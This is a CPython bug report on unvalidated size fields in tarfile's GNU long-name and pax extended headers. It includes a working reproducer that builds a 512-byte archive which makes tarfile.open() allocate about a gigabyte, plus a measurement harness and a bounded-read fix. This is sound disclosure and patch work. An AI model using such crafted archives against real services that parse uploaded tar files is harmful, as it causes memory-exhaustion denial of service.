tarfile: memory exhaustion via oversized extended-header (GNU long name / pax) size field #151497

# Bug report

### Bug description

`tarfile` reads a member's *extended header*, either a GNU long name/link (`GNUTYPE_LONGNAME` / `GNUTYPE_LONGLINK`) or a pax header (`XHDTYPE` / `XGLTYPE`), with a single read sized directly by the header's `size` field:

https://github.com/python/cpython/blob/main/Lib/tarfile.py#L1427
https://github.com/python/cpython/blob/main/Lib/tarfile.py#L1483

```python
buf = tarfile.fileobj.read(self._block(self.size))
```
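
In the line above, `self.size` is the value taken from the header, and `self._block()` only rounds it up to a whole number of 512-byte tar blocks. The amount requested from `read()` is therefore essentially the number the archive author chose. Below is a standalone sketch of that rounding. `round_up_to_block` is a hypothetical name that mirrors the private `TarInfo._block` helper; it is not a `tarfile` API.

```python
import tarfile

def round_up_to_block(count: int, blocksize: int = tarfile.BLOCKSIZE) -> int:
    """Round `count` up to a whole number of tar blocks (512 bytes each)."""
    blocks, remainder = divmod(count, blocksize)
    if remainder:
        blocks += 1
    return blocks * blocksize

# The reproducer's claimed size is already a multiple of 512,
# so the read request is exactly the claimed size.
print(round_up_to_block(1_000_000_000))  # 1000000000
print(round_up_to_block(1))              # 512
```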

`self.size` comes from the 12-byte size field of the extended-header member and is **not validated** against the data actually present. With GNU base-256 encoding the field can claim up to 2**88 - 1 bytes. A crafted 512-byte archive can therefore make `read()` pre-allocate gigabytes, and this happens on **open / iterate**: `tarfile.open()` itself parses the first member header and `getmembers()` parses the rest, all *before* any extraction filter runs.
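
The 2**88 bound comes from the base-256 layout. A leading `0x80` byte marks the field as binary, and the remaining 11 bytes hold a big-endian integer, so the largest claim is `256**11 - 1`. The sketch below builds such a header with the public `TarInfo.tobuf` API and reads the size back with `TarInfo.frombuf`. It assumes the standard ustar/GNU header layout, where the size field sits at offset 124 with length 12.

```python
import tarfile

MAX_CLAIM = 256 ** 11 - 1  # 11 payload bytes after the 0x80 marker, i.e. 2**88 - 1

ti = tarfile.TarInfo("A")
ti.type = tarfile.GNUTYPE_LONGNAME
ti.size = MAX_CLAIM
header = ti.tobuf(format=tarfile.GNU_FORMAT)  # still a single 512-byte block

size_field = header[124:136]  # the 12-byte size field
print(len(header))            # 512
print(size_field.hex())       # "80" then "ff" eleven times

parsed = tarfile.TarInfo.frombuf(header, "utf-8", "surrogateescape")
print(parsed.size == 2 ** 88 - 1)  # True

# One more does not fit in 11 bytes, so tobuf refuses to encode it.
ti.size = 256 ** 11
try:
    ti.tobuf(format=tarfile.GNU_FORMAT)
except ValueError as exc:
    print("ValueError:", exc)
```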

### Reproducer

```python
import os, resource, tarfile, tempfile

# A 512-byte tar whose single member is a GNU long-name header claiming ~1 GiB.
ti = tarfile.TarInfo("A")
ti.type = tarfile.GNUTYPE_LONGNAME
ti.size = 1_000_000_000          # claimed size; only the 512-byte header follows
data = ti.tobuf(format=tarfile.GNU_FORMAT)   # exactly 512 bytes

with tempfile.NamedTemporaryFile(suffix=".tar", delete=False) as f:
    f.write(data)
    path = f.name

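# ru_maxrss is the peak resident set size: KiB on Linux (bytes on macOS).
before = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
try:
    # tarfile.open() already parses the first header, so the oversized
    # read happens here, before any extraction filter could run.
    with tarfile.open(path, "r:") as t:
        t.getmembers()
except Exception as e:
    # The archive is truncated, so parsing fails, but only after the big read.
    print(type(e).__name__, e)
after = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
print(f"peak RSS delta: {(after - before) / 1024:.0f} MiB from a {os.path.getsize(path)}-byte file")
os.unlink(path)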
```

On current `main` this prints a peak RSS delta of ~950 MiB from a 512-byte file. The same applies to `GNUTYPE_LONGLINK` and to pax headers (`XHDTYPE`). Because the size field accepts base-256 encoding, a 512-byte file can claim, e.g., 1 TiB, raising `MemoryError` even on machines with plenty of RAM. The crafted header round-trips through `TarInfo.frombuf`, so it parses exactly like a normal archive.
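
To check all four extended-header types without actually exhausting memory, one option is to measure the size of the `read()` *request* instead of RSS. The sketch below assumes an in-memory `io.BytesIO` is an acceptable stand-in for a file, since `BytesIO.read(n)` never allocates more than the data it holds. `RecordingReader` and `largest_read_for` are hypothetical helpers, not part of `tarfile`. On a regular file, the same request would go to the underlying file object's `read()`. The numbers reflect the `tarfile` of whichever Python version runs it. With a chunked-read fix applied, the largest request would be expected to drop to the chunk size.

```python
import io
import tarfile

class RecordingReader(io.BytesIO):
    """In-memory file that remembers the largest read() request it receives."""

    def __init__(self, data):
        super().__init__(data)
        self.largest_request = 0

    def read(self, size=-1):
        if size is not None and size > self.largest_request:
            self.largest_request = size
        return super().read(size)

def largest_read_for(member_type, claimed_size):
    """Build a one-header archive and return the biggest read tarfile requests."""
    ti = tarfile.TarInfo("A")
    ti.type = member_type
    ti.size = claimed_size
    # GNU format falls back to base-256 when the size does not fit in octal.
    reader = RecordingReader(ti.tobuf(format=tarfile.GNU_FORMAT))
    try:
        with tarfile.open(fileobj=reader, mode="r:") as t:
            t.getmembers()
    except tarfile.TarError:
        pass  # the archive is truncated, so parsing fails after the big read
    return reader.largest_request

ONE_TIB = 2 ** 40
for name in ("GNUTYPE_LONGNAME", "GNUTYPE_LONGLINK", "XHDTYPE", "XGLTYPE"):
    print(name, largest_read_for(getattr(tarfile, name), ONE_TIB))
```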

### Suggested fix

Read the extended-header bytes in bounded chunks instead of one `read(size)`, so the claimed size can't force a huge up-front allocation. The returned bytes are unchanged for valid archives. I have a patch + regression tests ready and will open a PR.
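
Below is a minimal sketch of the bounded-read idea. It assumes only a file-like object with a `read(n)` method. `read_bounded` and the 1 MiB `CHUNK_SIZE` are hypothetical choices for illustration, not the code in the linked PR. On a regular file it returns the same bytes as one `read(size)` call, but memory grows with the data actually present rather than with the claimed size.

```python
import io

CHUNK_SIZE = 1 << 20  # hypothetical bound: at most 1 MiB per read() call

def read_bounded(fileobj, size, chunk_size=CHUNK_SIZE):
    """Read up to `size` bytes, never requesting more than `chunk_size` at once."""
    chunks = []
    remaining = size
    while remaining > 0:
        data = fileobj.read(min(remaining, chunk_size))
        if not data:  # EOF: the archive is shorter than the header claims
            break
        chunks.append(data)
        remaining -= len(data)
    return b"".join(chunks)

payload = b"x" * 3000
print(len(read_bounded(io.BytesIO(payload), 2 ** 40)))            # 3000
print(read_bounded(io.BytesIO(payload), 1024) == payload[:1024])  # True
```

A header claiming 1 TiB in a 512-byte file then costs roughly one chunk of memory instead of the claimed size, while archives whose data really is that large still read correctly.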

### CPython versions tested on

CPython main (also reproduces on the released branches).

### Operating systems tested on

Linux


### Linked PRs
* gh-151498
